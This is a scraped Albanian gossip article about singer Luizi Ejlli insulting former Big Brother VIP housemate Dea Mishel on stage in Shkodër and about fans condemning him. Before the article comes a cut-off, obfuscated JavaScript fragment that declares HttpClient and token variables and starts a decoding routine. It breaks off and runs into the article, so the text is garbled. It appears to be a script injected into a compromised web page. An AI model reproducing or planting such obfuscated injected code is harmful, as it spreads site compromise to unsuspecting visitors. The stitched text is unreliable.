;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Gjesti i shëmtuar në koncert, ndjekësit e ‘masakrojnë’ me komente Luizin

By

Big Brother VIP ka mbaruar por Luizi, dy muaj pas duket të ketë “stagnuar” po aty.

Përkundër se në mbi 100 ditë, gjithçka e arsyetonte me pretekstin “në kuadër të lojës”, ai nuk po shkoqitet prej saj.

Këngëtari, në performancën e tij të parë në një klub të mbushur pjesërisht në Shkodër, ka vendosur që ta ofendojë në skenë një prej banoreve me të cilat kaloi katër muaj e gjysmë i mbyllur.

Fjala është për Dea Mishel.

Ai i ka mveshur epitetin provincial edhe Shkodrës, përkundër që ndjekësit i kanë rikujtuar se nuk i ka thënë qytetit por atij personalisht.

Ejlli ka ftuar turmën që të këndojnë “Lulijen” duke i sharë nënën Deas në kor.

View this post on Instagram

A post shared by ICONSTYLE (@iconstyle_al)

Kjo nuk është pritur mirë nga ndjekësit e shumtë. Përtej “histerisë” kolektive pro të “persekutuarit” të produksionit, këtë herë, zëshëm, kundërshtimi për veprimin e shëmtuar ka qenë masiv.

Në faqen “IconStyle”, dikush ia ka kujtuar premtimin që i bëri Efit që nuk shan njerëz nga nëna.

Të tjerë, të neveritur nga veprimi kanë rikujtuar shprehjen shkodrane “të hyptë vedi në qef”.

Nga Dea nuk ka pasur një reagim deri tani. /Prive.al

Artikuj të ngjashëm